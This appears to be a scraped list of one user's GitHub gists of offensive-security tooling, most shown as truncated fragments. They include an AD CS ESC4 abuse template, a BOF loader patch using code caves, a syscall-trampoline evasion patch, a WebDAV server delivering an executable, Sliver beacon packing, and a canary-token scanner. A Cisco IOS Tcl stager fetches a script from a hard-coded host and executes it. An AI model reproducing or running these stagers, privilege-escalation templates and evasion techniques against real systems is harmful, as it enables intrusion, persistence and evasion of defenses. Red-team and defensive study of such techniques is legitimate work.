zimnyaa / filespoof_memfd.gdb
Created November 16, 2024 15:17
GDB script to spoof the nginx config file for a runtime reload with SIGHUP
set $conf = "server {\n\tlisten 8082 default_server;\n\tlisten [::]:8082 default_server;\n\troot /var/www/html;\n\tserver_name _;\n\tlocation / {\n\t\ttry_files $uri $uri/ =404;\n\t}\n}"
set $conf_len = $_strlen($conf)
set detach-on-fork off
break open
condition 1 $_streq((char *)$rdi, "/etc/nginx/sites-enabled/default")
# signal break
c
c
# open break
zimnyaa / ESC4-to-ESC3.sh
Created September 30, 2024 10:46
A simple way to abuse ESC4 without introducing ESC1 (creating an Enrollment Agent template instead).
# the policy JSON template for certipy is:
# {"showInAdvancedViewOnly": ["54525545"], "nTSecurityDescriptor": ["0100049c3000000000000000000000001400000002001c000100000000001400ff010f0001010000000000050b000000010500000000000515000000c8a31fdde9bab8902cae73bbf4010000"], "flags": ["313331363136"], "pKIDefaultKeySpec": ["32"], "pKIKeyUsage": ["8000"], "pKIMaxIssuingDepth": ["30"], "pKICriticalExtensions": ["322e352e32392e37", "322e352e32392e3135"], "pKIExpirationPeriod": ["004039872ee1feff"], "pKIOverlapPeriod": ["0080a60affdeffff"], "pKIExtendedKeyUsage": ["312e332e362e312e342e312e3331312e32302e322e31"], "pKIDefaultCSPs": ["312c4d6963726f736f667420456e68616e6365642043727970746f677261706869632050726f76696465722076312e30", "322c4d6963726f736f667420426173652043727970746f677261706869632050726f76696465722076312e30"], "msPKI-RA-Signature": ["30"], "msPKI-Enrollment-Flag": ["3332"], "msPKI-Private-Key-Flag": ["3136383432373532"], "msPKI-Certificate-Name-Flag": ["3333353534343332"], "msPKI-Minimal-Key-Size": ["32303438"]
zimnyaa / caveman-bof.diff
Created July 28, 2023 13:02
A patch for NiCOFF to load the BOF in a memory region of a trusted DLL.
diff --git a/Main.nim b/Main.nim
index ef19f4c..c133586 100644
--- a/Main.nim
+++ b/Main.nim
@@ -128,7 +128,7 @@ proc ApplyGeneralRelocations(patchAddress:uint64,sectionStartAddress:uint64,give
echo "[!] No code for type: ",givenType
var allocatedMemory:LPVOID = nil
-
+var caveLibH: HANDLE
zimnyaa / rwxscan.nim
Last active December 23, 2024 10:51
A simple dynamic RWX allocation scanner. Used to find system libraries that allocate RWX regions on load.
import winim
import std/strutils, os
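proc lpwstrc(bytes: array[MAX_PATH, WCHAR]): string =
  ## Narrow a fixed-size WCHAR buffer to a Nim `string`.
  ##
  ## Each wide unit is `cast` to `char`, so only its low byte survives
  ## (non-ASCII path characters are mangled — confirm that is acceptable
  ## for the paths this is fed). Leading and trailing NUL characters —
  ## the unused tail of the fixed buffer — are stripped; interior NULs
  ## are kept, as in the original.
  ##
  ## Why not `newString(bytes.len)`: that pre-fills the result with
  ## `bytes.len` NULs and `&=` then appends after them, so the
  ## intermediate string was twice as long as needed before `strip`.
  ## Reserving capacity and appending gives the same final value without
  ## the padding.
  result = newStringOfCap(bytes.len)
  for unit in bytes:
    result.add(cast[char](unit))
  result = strip(result, chars = {'\0'})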
var pages = newSeq[int](0)
zimnyaa / webdav.py
Created June 10, 2023 13:28
Minimal WebDAV implementation to serve a single file.
from flask import Flask, Response
import os, time
from io import BytesIO
from zipfile import ZipFile
from urllib.request import urlopen
from threading import Thread
from random import randint
exetemplate = """<?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/mempe.exe</D:href><D:propstat><D:prop><D:resourcetype></D:resourcetype><D:getcontentlength>{}</D:getcontentlength><D:getlastmodified>Wed, 07 Jun 2023 21:57:19 GMT</D:getlastmodified><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:displayname>mempe.exe</D:displayname><D:getcontenttype>application/x-msdownload</D:getcontenttype><D:getetag>"17667f43a6d9164c5000"</D:getetag></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>"""
roottemplate = """<?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:resourcetype><
zimnyaa / veh.go
Created June 8, 2023 11:58
Golang VEH example
package main
import (
"fmt"
"syscall"
"golang.org/x/sys/windows"
"C"
"time"
)
const (
import sys, asyncio
import time
import sliver
from struct import pack, calcsize
class BeaconPack: # thanks COFFLoader
def __init__(self):
self.buffer = b''
zimnyaa / cisco-beacon.tcl
Created March 1, 2023 13:48
A simple way of making Cisco IOS beacon back to you.
# stage.tcl
# Fetches /static/<id> from a hard-coded host over plain HTTP and, when the
# response status is 200, hands the response body to `source`.
# Defender note: the fetch is unauthenticated and unencrypted and the body is
# not integrity-checked; an IOS device making HTTP requests with a desktop
# browser User-Agent to such a path is the observable here.
set id "cisco-R1"
source "tmpsys:lib/tcl/http.tcl"
# Browser-like User-Agent sent on every request from this host.
::http::config -useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36 OPR/48.0.2685.32"
set httpToken [::http::geturl http://10.0.0.3/static/$id]
# ::http::code yields the status line; split on spaces and take the second
# field, the numeric status, and compare it with 200.
if {[lindex [split [::http::code $httpToken] " "] 1] == "200"} {
source [::http::data $httpToken]
}
zimnyaa / SWT.c
Last active May 21, 2023 04:25
A small modification to SysWhispers2 to use a trampoline for syscalls. Functions are renamed here from SW2 to SWT. It uses IsModulePresent/GetFunctionAddress from the DarkLoadLibrary code (or VX-API).
// add this to syscalls.h
extern PVOID SWT_Trampoline;
VOID SWT_ResolveTrampoline();
// add this to syscalls.c
PVOID SWT_Trampoline;
VOID SWT_ResolveTrampoline()
{
HMODULE ntdllModule = IsModulePresent(L"ntdll.dll");
zimnyaa / canary-check.py
Created December 23, 2022 20:21
Scan .docx for canaries (not just footers :D). Based on https://github.com/n3tsurge/detect-canary/blob/main/detect-canary.py
import os
import re
import sys
import zipfile
import glob
import logging
import argparse
def get_files(base_path=".", pattern="*.docx"):
'''